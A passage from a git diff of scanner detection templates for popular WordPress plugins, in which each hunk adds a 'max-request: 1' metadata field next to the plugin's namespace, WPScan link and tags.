+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
+    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
+    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
+    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 846761f2f7..2249681b6d 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
+    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
+    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
+    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
+    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
+    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
+    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
+    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
+    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
+    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
+    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
+    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
+    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
+    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
+    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
+    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
+    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
+    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
+    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index ba558305a4..6b0ed799ef 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
+    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
+    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
+    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
+    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 7ed171d662..254f916291 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 7161671960..b9de0ee313 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
+    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
+    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
+    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
+    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
+    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
+    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
+    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
+    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
+    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
+    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
+    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 1778552d75..9c6e3e6d2e 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
+    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
+    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
